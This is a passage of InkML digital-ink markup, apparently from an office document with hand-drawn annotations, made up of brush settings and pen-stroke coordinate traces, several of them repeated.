      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 30 24575,'9'0'0,"1"-1"0,-1-1 0,0 0 0,14-4 0,27-6 0,120 6 0,269 23 0,-337-10 0,373 47 0,-255-25 0,222 2 0,683-34 0,-812 31 0,-17-1 0,-209-29 0,52 3 0,-136 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,-1 5 0,3 13 0,-2-1 0,0 0 0,-3 25 0,1-20 0,1 155 0,-5 116 0,-34-8 0,10-111 0,16-78 0,2-29 0,2 0 0,4 1 0,5 97 0,23 4 0,3 38 0,-5 145 0,-9 218 0,-14-356 0,2 1905 0,-2-2088 0,-2 1 0,-14 61 0,-1-4 0,13-40 0,2-20 0,0 0 0,-2 0 0,-11 32 0,16-60 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1-2 0,-1 1 0,0 0 0,-4-2 0,-8-1 0,1-2 0,-1 0 0,1-1 0,-24-14 0,-5-1 0,-1 7 0,-1 2 0,-78-11 0,45 9 0,39 6 0,-8-2 0,1 2 0,-88-3 0,-650 12 0,1438-1 0,-629 2 0,0 0 0,26 7 0,27 2 0,180 29 0,-190-25 0,0-4 0,129 6 0,-152-20 0,49-8 0,-51 4 0,63-1 0,13 11 0,135-5 0,-151-10 0,51-3 0,-102 14 0,87-13 0,-116 10 0,58-10 0,163-6 0,630 21 0,-835-2 0,56-11 0,-54 5 0,45 0 0,981 5 0,-521 4 0,-423-3 0,-11-1 0,199 22 0,-258-15 0,83-1 0,-86-4 0,-1 1 0,53 10 0,-5 0 0,1-3 0,151-9 0,-94-2 0,1268 3 0,-1381-2 0,52-9 0,35-2 0,-121 13 0,259-16 0,-146 5 0,197 9 0,-152 4 0,1946-2 0,-1651 31 0,-209-8 0,-123-12 0,149 6 0,-12-5 0,8 1 0,-48-11 0,173-5 0,-274-10 0,51-1 0,-124 12 0,-36 1 0,1 0 0,0 1 0,0 0 0,0 2 0,0 0 0,20 5 0,-33-5 0,0 0 0,0 0 0,0 0 0,0 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0 6 0,0 16 0,-2-1 0,-1 1 0,-8 34 0,6-35 0,-11 48 0,-30 82 0,-6 25 0,41-127 0,3 1 0,2 0 0,1 79 0,6-63-1365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0.794"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">9764 13 24524,'-9764'0'0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4.079"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">65 0 24575,'-1'16'0,"-1"0"0,0 0 0,-7 22 0,-1 6 0,4-14 0,-3 17 0,2 1 0,-1 70 0,9 384 0,-12-417-1365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07.440"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">217 24 24575,'-30'0'0,"17"-1"0,-1 1 0,0 0 0,1 1 0,-1 0 0,-18 5 0,29-5 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 7 0,-1 2 0,1 1 0,0 0 0,1 0 0,0 0 0,1-1 0,6 26 0,-6-34 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,7 1 0,0 0 0,0 0 0,1-1 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1-1 0,0 0 0,17-5 0,-23 6 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1-1 0,-1 1 0,1 0 0,0-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1-8 0,0 4 0,0-1 0,-1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,-3-10 0,2 16 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,-8-5 0,4 3 0,-1-1 0,0 1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 2 0,-1-1 0,-12 1 0,16 1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,-5 6 0,-1 2 0,1 0 0,0 1 0,1 1 0,0-1 0,1 1 0,-9 26 0,13-35 0,2 0 0,-1 0 0,0 0 0,1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,6 9 0,-7-10 0,1 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 0 0,6-1 0,-2 0 0,-1 0 0,1-1 0,-1 1 0,0-2 0,0 1 0,0-1 0,0 1 0,-1-1 0,1-1 0,-1 1 0,0-1 0,4-6 0,-3 5-68,-1 0 0,0-1-1,-1 0 1,1 0 0,-1 0 0,-1 0-1,0 0 1,0-1 0,0 0 0,-1 0-1,0 1 1,0-1 0,-1-1 0,0 1-1,0 0 1,-1 0 0,0 0 0,-1 0-1,-2-11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16.182"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 30 24575,'9'0'0,"1"-1"0,-1-1 0,0 0 0,14-4 0,27-6 0,120 6 0,269 23 0,-337-10 0,373 47 0,-255-25 0,222 2 0,683-34 0,-812 31 0,-17-1 0,-209-29 0,52 3 0,-136 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,-1 5 0,3 13 0,-2-1 0,0 0 0,-3 25 0,1-20 0,1 155 0,-5 116 0,-34-8 0,10-111 0,16-78 0,2-29 0,2 0 0,4 1 0,5 97 0,23 4 0,3 38 0,-5 145 0,-9 218 0,-14-356 0,2 1905 0,-2-2088 0,-2 1 0,-14 61 0,-1-4 0,13-40 0,2-20 0,0 0 0,-2 0 0,-11 32 0,16-60 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1-2 0,-1 1 0,0 0 0,-4-2 0,-8-1 0,1-2 0,-1 0 0,1-1 0,-24-14 0,-5-1 0,-1 7 0,-1 2 0,-78-11 0,45 9 0,39 6 0,-8-2 0,1 2 0,-88-3 0,-650 12 0,1438-1 0,-629 2 0,0 0 0,26 7 0,27 2 0,180 29 0,-190-25 0,0-4 0,129 6 0,-152-20 0,49-8 0,-51 4 0,63-1 0,13 11 0,135-5 0,-151-10 0,51-3 0,-102 14 0,87-13 0,-116 10 0,58-10 0,163-6 0,630 21 0,-835-2 0,56-11 0,-54 5 0,45 0 0,981 5 0,-521 4 0,-423-3 0,-11-1 0,199 22 0,-258-15 0,83-1 0,-86-4 0,-1 1 0,53 10 0,-5 0 0,1-3 0,151-9 0,-94-2 0,1268 3 0,-1381-2 0,52-9 0,35-2 0,-121 13 0,259-16 0,-146 5 0,197 9 0,-152 4 0,1946-2 0,-1651 31 0,-209-8 0,-123-12 0,149 6 0,-12-5 0,8 1 0,-48-11 0,173-5 0,-274-10 0,51-1 0,-124 12 0,-36 1 0,1 0 0,0 1 0,0 0 0,0 2 0,0 0 0,20 5 0,-33-5 0,0 0 0,0 0 0,0 0 0,0 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0 6 0,0 16 0,-2-1 0,-1 1 0,-8 34 0,6-35 0,-11 48 0,-30 82 0,-6 25 0,41-127 0,3 1 0,2 0 0,1 79 0,6-63-1365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0.794"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">9764 13 24524,'-9764'0'0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4.079"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">65 0 24575,'-1'16'0,"-1"0"0,0 0 0,-7 22 0,-1 6 0,4-14 0,-3 17 0,2 1 0,-1 70 0,9 384 0,-12-417-1365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07.440"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">217 24 24575,'-30'0'0,"17"-1"0,-1 1 0,0 0 0,1 1 0,-1 0 0,-18 5 0,29-5 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 7 0,-1 2 0,1 1 0,0 0 0,1 0 0,0 0 0,1-1 0,6 26 0,-6-34 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,7 1 0,0 0 0,0 0 0,1-1 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1-1 0,0 0 0,17-5 0,-23 6 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1-1 0,-1 1 0,1 0 0,0-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1-8 0,0 4 0,0-1 0,-1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,-3-10 0,2 16 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,-8-5 0,4 3 0,-1-1 0,0 1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 2 0,-1-1 0,-12 1 0,16 1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,-5 6 0,-1 2 0,1 0 0,0 1 0,1 1 0,0-1 0,1 1 0,-9 26 0,13-35 0,2 0 0,-1 0 0,0 0 0,1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,6 9 0,-7-10 0,1 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 0 0,6-1 0,-2 0 0,-1 0 0,1-1 0,-1 1 0,0-2 0,0 1 0,0-1 0,0 1 0,-1-1 0,1-1 0,-1 1 0,0-1 0,4-6 0,-3 5-68,-1 0 0,0-1-1,-1 0 1,1 0 0,-1 0 0,-1 0-1,0 0 1,0-1 0,0 0 0,-1 0-1,0 1 1,0-1 0,-1-1 0,0 1-1,0 0 1,-1 0 0,0 0 0,-1 0-1,-2-11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7:19:19.170"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 3 24575,'61'0'0,"-18"-2"0,1 2 0,-1 2 0,0 1 0,0 3 0,75 19 0,70 27 0,-2-1 0,101 59 0,-230-84 0,-2 4 0,102 70 0,-123-71 0,45 48 0,-11-10 0,650 649 0,-526-492 0,-105-117 0,186 177 0,478 327 0,-226-240 0,-201-148 0,-264-184 0,70 33 0,-19-12 0,-15-7 0,3-3 0,1-5 0,2-5 0,125 33 0,540 110 0,-690-169 0,1-3 0,84 0 0,160-13 0,-139-1 0,1727 2 0,-1327-33 0,0-40 0,-522 65 0,631-118 0,-602 103 0,1 4 0,130-12 0,340-41 0,-520 66 0,118-18 0,-99 16 0,74-20 0,-85 17 0,1 1 0,86-6 0,-60 10 0,145-32 0,-53 7 0,20-7 0,26-4 0,-89 17 0,-82 15 0,52-6 0,35-7 0,6-1 0,-134 25 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,3 3 0,-5-3 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,-1 2 0,-12 29 0,-99 210 0,87-198 0,-2-2 0,-2 0 0,-1-2 0,-72 70 0,103-109 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-2 0 0,3-1 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,1-2 0,21-55 0,65-72 0,3-7 0,-59 79 0,-2-1 0,-4-1 0,24-79 0,-48 136 0,-1 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,0 1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,-2-2 0,-8-5 0,0 0 0,-1 1 0,-14-6 0,17 9 0,-73-31 0,-107-30 0,-19-6 0,123 39 0,-45-20 0,131 50 0,8 1 0,14 3 0,21 8 0,-1 2 0,0 2 0,57 27 0,114 70 0,-208-109 0,39 22 0,0-2 0,83 27 0,-125-48 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-2 2 0,-3 10 0,0 0 0,-1 0 0,-1 0 0,-12 17 0,9-14 0,-23 40 0,-2 0 0,2 1 0,3 2 0,3 0 0,-29 94 0,53-138-273,-2-1 0,0 1 0,-1-1 0,-14 26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7:22:41.816"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'17'2'0,"-1"0"0,0 1 0,1 1 0,-1 0 0,16 7 0,3 1 0,607 223 0,-57-17 0,-261-113 0,226 72 0,158-15 0,697 72 0,-1189-201 0,828 117 0,-888-129 0,643 39 0,3-60 0,-341-4 0,488-30 0,-582 17 0,-194 13 0,111-31 0,-193 20 0,554-77 0,-417 74 0,-137 13 0,111-19 0,-171 18 0,-1-1 0,0-2 0,-1-1 0,0-1 0,0-2 0,-2 0 0,43-29 0,-70 42 0,20-15 0,0 1 0,1 0 0,0 2 0,1 0 0,1 1 0,0 2 0,0 0 0,35-8 0,-13 8 0,-29 4 0,-1 2 0,1 0 0,0 1 0,-1 0 0,1 1 0,16 2 0,-31-1 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,0 0 0,1 2 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-2 3 0,-3 9 0,-2 0 0,-14 29 0,18-40 0,-155 236 0,13-24 0,131-191 0,0 0 0,2 1 0,-16 50 0,30-75 0,5-8 0,7-12 0,-13 17 0,240-429 0,-232 413 0,-1 0 0,-1 0 0,0-1 0,-2 0 0,0 0 0,3-25 0,-7 32 0,0-1 0,-1 1 0,0 0 0,-1-1 0,0 1 0,-1 0 0,-1 0 0,0 0 0,0 0 0,-10-22 0,10 29 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,-1 0 0,0-1 0,0 1 0,-1 1 0,1-1 0,-1 0 0,0 1 0,0 0 0,0 1 0,0-1 0,-9-3 0,-5 1 0,0 1 0,0 0 0,-33-2 0,11 2 0,-773-115-1365,770 112-5461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16.182"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 30 24575,'9'0'0,"1"-1"0,-1-1 0,0 0 0,14-4 0,27-6 0,120 6 0,269 23 0,-337-10 0,373 47 0,-255-25 0,222 2 0,683-34 0,-812 31 0,-17-1 0,-209-29 0,52 3 0,-136 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,-1 5 0,3 13 0,-2-1 0,0 0 0,-3 25 0,1-20 0,1 155 0,-5 116 0,-34-8 0,10-111 0,16-78 0,2-29 0,2 0 0,4 1 0,5 97 0,23 4 0,3 38 0,-5 145 0,-9 218 0,-14-356 0,2 1905 0,-2-2088 0,-2 1 0,-14 61 0,-1-4 0,13-40 0,2-20 0,0 0 0,-2 0 0,-11 32 0,16-60 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1-2 0,-1 1 0,0 0 0,-4-2 0,-8-1 0,1-2 0,-1 0 0,1-1 0,-24-14 0,-5-1 0,-1 7 0,-1 2 0,-78-11 0,45 9 0,39 6 0,-8-2 0,1 2 0,-88-3 0,-650 12 0,1438-1 0,-629 2 0,0 0 0,26 7 0,27 2 0,180 29 0,-190-25 0,0-4 0,129 6 0,-152-20 0,49-8 0,-51 4 0,63-1 0,13 11 0,135-5 0,-151-10 0,51-3 0,-102 14 0,87-13 0,-116 10 0,58-10 0,163-6 0,630 21 0,-835-2 0,56-11 0,-54 5 0,45 0 0,981 5 0,-521 4 0,-423-3 0,-11-1 0,199 22 0,-258-15 0,83-1 0,-86-4 0,-1 1 0,53 10 0,-5 0 0,1-3 0,151-9 0,-94-2 0,1268 3 0,-1381-2 0,52-9 0,35-2 0,-121 13 0,259-16 0,-146 5 0,197 9 0,-152 4 0,1946-2 0,-1651 31 0,-209-8 0,-123-12 0,149 6 0,-12-5 0,8 1 0,-48-11 0,173-5 0,-274-10 0,51-1 0,-124 12 0,-36 1 0,1 0 0,0 1 0,0 0 0,0 2 0,0 0 0,20 5 0,-33-5 0,0 0 0,0 0 0,0 0 0,0 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0 6 0,0 16 0,-2-1 0,-1 1 0,-8 34 0,6-35 0,-11 48 0,-30 82 0,-6 25 0,41-127 0,3 1 0,2 0 0,1 79 0,6-63-1365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7:46:50.525"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">968 81 24575,'-506'0'0,"474"-1"0,-58-11 0,55 6 0,-43-2 0,73 8 0,-12-1 0,0 0 0,1 1 0,-1 1 0,0 1 0,-28 7 0,41-8 0,-1 1 0,1 0 0,0 0 0,0 1 0,-1-1 0,2 1 0,-1 0 0,0 0 0,0 0 0,1 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,1 1 0,-1-1 0,0 1 0,1-1 0,0 1 0,-1 8 0,-3 34 0,1 1 0,3-1 0,5 48 0,0 14 0,-4 715 0,-9-765 0,8-52 0,-1 0 0,1-1 0,0 1 0,0 0 0,1 0 0,0 0 0,1 13 0,0-17 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0-1 0,1 1 0,-1-1 0,5 2 0,30 10 0,0-1 0,1-2 0,1-2 0,0-1 0,45 1 0,-13 3 0,-47-6 0,52 3 0,206-10 0,130 4 0,-287 11 0,43 1 0,888-16 0,-1046 3 0,0-2 0,0 1 0,0-1 0,-1-1 0,1 0 0,0-1 0,-1 0 0,11-4 0,-17 5 0,0 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1-4 0,25-181 0,-3 45 0,0-8 0,-11 92 0,-4-1 0,1-65 0,-10-522 0,1 645 0,1 0 0,-1-1 0,0 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,-4-4 0,1 5 0,1-1 0,-1 0 0,0 1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,-1 0 0,-9 0 0,-213-21 0,98 11 0,-146-5 0,-1069 17 0,1329 0-170,-1 1-1,0 1 0,1 0 1,0 1-1,0 1 0,0 0 1,-18 9-1,18-7-6655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9:24:22.8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29,'0'-1,"1"0,-1 0,1 0,0-1,-1 1,1 0,0 0,0 0,-1 0,1 0,0 0,0 1,0-1,0 0,0 0,0 1,1-1,-1 0,0 1,0-1,0 1,1 0,-1-1,0 1,0 0,1 0,1 0,43-5,-40 5,527-3,-273 5,455-2,-700 1,0 1,0 0,0 1,15 5,-12-3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0.794"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">9764 13 24524,'-9764'0'0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4.079"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">65 0 24575,'-1'16'0,"-1"0"0,0 0 0,-7 22 0,-1 6 0,4-14 0,-3 17 0,2 1 0,-1 70 0,9 384 0,-12-417-1365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2:29.416"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">3431 146 24575,'-1'5'0,"1"1"0,-1-1 0,-1-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,-8 7 0,-60 50 0,54-48 0,-4 1 0,-1-1 0,-1-2 0,0 0 0,-1-1 0,0-1 0,-47 11 0,-19 7 0,8-3 0,0-3 0,-165 18 0,-48 10 0,241-39 0,-1-2 0,-67 1 0,104-8 0,-113 11 0,-59 1 0,-570-14 0,733 0 0,0-1 0,-1-1 0,1-2 0,-41-11 0,-102-47 0,147 51 0,0 0 0,0-2 0,2-1 0,-34-29 0,-29-19 0,61 45 0,0-2 0,2 0 0,0-1 0,1-1 0,-21-30 0,-16-19 0,18 20 0,36 48 0,1 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,0-8 0,1 10 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 